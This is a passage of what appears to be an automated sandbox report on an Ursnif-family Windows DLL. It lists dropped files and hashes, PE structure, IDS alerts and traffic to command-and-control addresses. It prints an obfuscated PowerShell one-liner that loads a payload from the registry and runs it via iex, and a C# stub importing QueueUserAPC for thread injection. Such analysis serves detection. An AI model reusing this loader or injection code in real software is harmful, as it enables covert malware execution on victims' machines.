                        Preview:L......b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP...................%.uz{&.@Y..........4.......C:\Users\user\AppData\Local\Temp\RESDBAB.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.r.x.p.c.r.x.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnpdahnp.it4.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5tkumna.vlc.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.1007656956481933
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryq5ak7YnqqHOPN5Dlq5J:+RI+ycuZhNmakSuPNnqX
                        MD5:FF3BFB8D3A0A9EA79E282805E8CE2A46
                        SHA1:A44C9C73E8FED7E57DF7D1A86D2D73FF710DC719
                        SHA-256:985C9235CD600547CD3336BB98F34F1B06DC62F755586E25329661B988A3BBF8
                        SHA-512:E4AAE728A3F27722D4D153F0567F3E4DD412847B8D44DB0294198907439ED3E17F67AC5996890ED5579B21615E11F5F0FCE38A5169B3FDE1BAC7169D79087009
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.n.2.v.1.u.0.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.n.2.v.1.u.0.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                        C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.0.cs

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):403
                        Entropy (8bit):5.058106976759534
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                        MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                        SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                        SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                        SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                        Malicious:false
                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                        C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):369
                        Entropy (8bit):5.269530833890747
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fA2FT10zxs7+AEszIwkn23fA2FTdx:p37Lvkmb6KRfDFTqWZEifDFTP
                        MD5:9D07155D75E02CC9B3D9B4BCA2605724
                        SHA1:F26FBE154EC5A82B3EACBDC85DBA95D2D24258C7
                        SHA-256:7AFEA3ADB85E27E452FC85ABFE5C5DA6615BA9140937642383ECD4477E9B02B0
                        SHA-512:9307FDD16B84411C020C204B393C34CCC81ABE46C6575BB4892D32349ECAF9D321CCB2EA0F5C026B1EAAE0B134799B63547B7601F999EF7E3667DEAC71ED1AB6
                        Malicious:false
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.0.cs"

                        C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.615083133545037
                        Encrypted:false
                        SSDEEP:24:etGSy8OmU0t3lm85xWAseO4zxQ64pfUPtkZfaFVUWI+ycuZhNmakSuPNnq:6MXQ3r5xNOKQfUuJaD31ulma3yq
                        MD5:8443C1932024BF12E88200AEEA3979A9
                        SHA1:4B27B0D2CF3FAF614B4620719CDB2B65354EA9D0
                        SHA-256:60C95F0C07FCFECF930E9A6CF6B0035506F542EF69ED81C18AABB2F8BC90CC1C
                        SHA-512:E4AF72D9E12D8620EE6A910DD0E24D3CABE7F85C6673B71150E1FB2F716E1DE0FAA45A61BEE9A4B993A00ACD27A908D00FDE959A9DCBB9648389D3C2DD18BB2D
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                        C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.out

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.336764594163779
                        Encrypted:false
                        SSDEEP:24:AId3ka6KRfpEifwKaM5DqBVKVrdFAMBJTH:Akka6CpEuwKxDcVKdBJj
                        MD5:18E084FB1E0641B906E1057F169FD512
                        SHA1:34E718C95372728B9E6725DA855013D621C09E1F
                        SHA-256:80B51B15FB9DEE28E44B9EC5D4FA97C740635F4C986AFBE3F462569F25ED035E
                        SHA-512:6C5C704F14497B4292EE0FBC851A34305F2600FCBEDE5BA746F764F4926518B47AEAC1EE3100A8954EBA1F5241FADDA18B4EFF8E4620135C7BEF41D7D8D29B68
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                        C:\Users\user\Documents\20220525\PowerShell_transcript.468325.mIKzyOcS.20220525112740.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1367
                        Entropy (8bit):5.377240760406581
                        Encrypted:false
                        SSDEEP:24:BxSA/l7vBZ0x2DOXUWc15RfLCH94qWMHjeTKKjX4CIym1ZJXHHk15RfLCH94DGnx:BZ5vj0oO815R894tMqDYB1ZBk15R894a
                        MD5:7ACB5D1BD81125AB675652E41023E0F0
                        SHA1:9FC97485AC5DAAACC281A2B8EFB5EF12596C3F64
                        SHA-256:30FE99D16BFDC9CEFF28EF81808969276F3F8651FE14126D5486D7C2B0C4B335
                        SHA-512:ACF043703C782764BB648C1985A7A6704F95C8E8A2C8082B71CB04166DC3E62F178FA4B96EF2F73AC30980D406A207E3C27CB42BE96AC69EC0A4BDAFF70072F3
                        Malicious:false
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220525112742..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6824..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220525112742..**********************..PS>new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famn

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.281202320961198
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:zs5n5sI6N2.dll
                        File size:438272
                        MD5:9ce6868cb546819a7ba2fc27f91a3777
                        SHA1:6052120b0375f44ede4985ad98f7bd89beb70c2b
                        SHA256:fc4bee1a68545b7067fad93ba74478641acd683117f9fe478a4941d7146db959
                        SHA512:ac6ae26a27242161fe48431916c8c7bfe2dea1b8f0b8ec1e07c30e4990d6cdb0c383ee846ba319eef082a50a90a858d5cb10f7fa4b00acbf0717b866105c51f6
                        SSDEEP:6144:SpmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:FsBUSzjLIRBMkf9dHLpKepKr6CvXG
                        TLSH:9894F14897685D66D84647370CE1971EFCE7FE2EE63B7ABE20642C8FF95B0104512B0A
                        File Content Preview:MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich...

                        File Icon

                        Icon Hash:9068eccc64f6e2ad

                        Static PE Info

                        General

                        Entrypoint:0x401520
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:8000dfa78ad003480e4532227762516a

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        inc edx
                        add ecx, FFFFFFFFh
                        call 00007FD190FDD4AAh
                        pop eax
                        pop eax
                        mov dword ptr [004136F4h], eax
                        mov edx, dword ptr [00413810h]
                        sub edx, 00005289h
                        call edx
                        mov eax, ebx
                        mov dword ptr [004136F0h], eax
                        mov eax, esi
                        mov dword ptr [004136E8h], eax
                        mov dword ptr [004136F8h], ebp
                        mov dword ptr [004136ECh], edi
                        add dword ptr [004136F8h], 00000004h
                        loop 00007FD190FDD457h
                        mov dword ptr [ebp+00h], eax
                        nop
                        nop
                        or ebx, dword ptr [ebp+449BB717h]
                        fsub st(0), st(5)
                        push edx
                        pop edx
                        jnp 00007FD190FDD4F3h
                        out dx, eax
                        push ebp
                        push ebx
                        test byte ptr [ecx+7B670685h], cl
                        inc esp
                        cmp al, BBh
                        push ebx
                        mov cl, C6h
                        das
                        mov ah, 17h
                        wait
                        cmpsb
                        jnbe 00007FD190FDD4CCh
                        cmpsb
                        fst qword ptr [edi-25h]
                        out 23h, al
                        jnbe 00007FD190FDD4B2h
                        jno 00007FD190FDD503h
                        salc
                        dec byte ptr [edx+67779444h]
                        pop eax
                        cmp al, 97h
                        outsd
                        ror byte ptr [ecx+ecx*2], FFFFFFD3h
                        inc edx
                        inc ebx
                        mov edx, 8F4D5DB0h
                        add bl, ch
                        mov ebp, 10EBFDC4h
                        jmp far fword ptr [esi]
                        push ecx
                        mov ch, ah
                        push ebx
                        inc esi
                        xchg eax, ebp
                        mov esp, 2E29FAE8h
                        cmc
                        test al, BFh
                        scasd
                        fucom st(2), st(0)
                        movsd
                        mov ebp, 3238AE00h
                        retf D184h
                        mov ebx, 568788E4h
                        insd

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd8a00x8c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x9f28.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6b0000xf3c.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0xd0000x7c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xb8c00xc000False0.0830688476562data1.12975257539IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0xd0000xbea0x1000False0.2861328125data4.80028446978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xe0000x7b800x6000False0.380167643229data5.99739209586IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .crt0x160000x1dc010x1e000False0.988452148437data7.98104004555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .erloc0x340000x2c91e0x2d000False0.988232421875data7.98142116636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0x610000x9f280xa000False0.602783203125data6.51666400073IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                        .reloc0x6b0000x133a0x2000False0.218994140625data3.75989927364IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_BITMAP0x613600x666dataEnglishUnited States
                        RT_ICON0x619c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0x662280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                        RT_ICON0x687d00xea8dataEnglishUnited States
                        RT_ICON0x696780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x69f200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_DIALOG0x6a4880xb4dataEnglishUnited States
                        RT_DIALOG0x6a5400x120dataEnglishUnited States
                        RT_DIALOG0x6a6600x158dataEnglishUnited States
                        RT_DIALOG0x6a7b80x202dataEnglishUnited States
                        RT_DIALOG0x6a9c00xf8dataEnglishUnited States
                        RT_DIALOG0x6aab80xa0dataEnglishUnited States
                        RT_DIALOG0x6ab580xeedataEnglishUnited States
                        RT_GROUP_ICON0x6ac480x4cdataEnglishUnited States
                        RT_VERSION0x6ac980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                        Imports

                        DLLImport
                        ADVAPI32.dllEnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount
                        msvcrt.dllfgetwc, strcoll
                        USER32.dllGetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn
                        GDI32.dllGetCharWidthFloatA, GetTextMetricsW, ExtEscape
                        OLEAUT32.dllLoadTypeLibEx
                        KERNEL32.dllGetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree

                        Version Infos

                        DescriptionData
                        LegalCopyright A Company. All rights reserved.
                        InternalName
                        FileVersion1.0.0.0
                        CompanyNameA Company
                        ProductName
                        ProductVersion1.0.0.0
                        FileDescription
                        OriginalFilenamemyfile.exe
                        Translation0x0409 0x04b0

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.413.107.42.1649765802033203 05/25/22-11:27:05.996967TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976580192.168.2.413.107.42.16
                        192.168.2.413.107.42.1649765802033204 05/25/22-11:27:05.996967TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976580192.168.2.413.107.42.16
                        192.168.2.4176.10.119.6849771802033203 05/25/22-11:27:28.182548TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977180192.168.2.4176.10.119.68
                        192.168.2.4176.10.119.6849771802033204 05/25/22-11:27:27.011665TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977180192.168.2.4176.10.119.68

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        May 25, 2022 11:27:26.101047993 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.119206905 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.119359970 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.119944096 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.137732029 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.411830902 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.411885023 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.411897898 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.411990881 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412034035 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412241936 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412262917 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412298918 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412312031 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412319899 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412427902 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412446022 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412457943 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412484884 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412497044 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412524939 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412575006 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412811995 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412832022 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412842989 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412864923 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412899971 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.412903070 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.412951946 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431308031 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431339025 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431351900 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431366920 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431384087 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431395054 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431467056 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431495905 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431587934 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431607008 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431618929 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431644917 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431674957 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431727886 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431746960 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431760073 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.431782961 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431796074 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.431967974 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432013988 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432110071 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432123899 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432157993 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432246923 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432266951 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432277918 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432302952 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432323933 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432363033 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432382107 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432393074 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432410002 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432418108 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432429075 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432432890 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432440996 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432461023 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432497978 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432504892 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432523966 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432535887 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432549000 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432562113 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432570934 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.432595015 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432616949 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.432650089 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.449609995 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449646950 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449666023 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449687958 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449695110 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.449709892 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449722052 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.449727058 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449742079 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.449748993 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449759960 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.449773073 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.449788094 CEST8049771176.10.119.68192.168.2.4
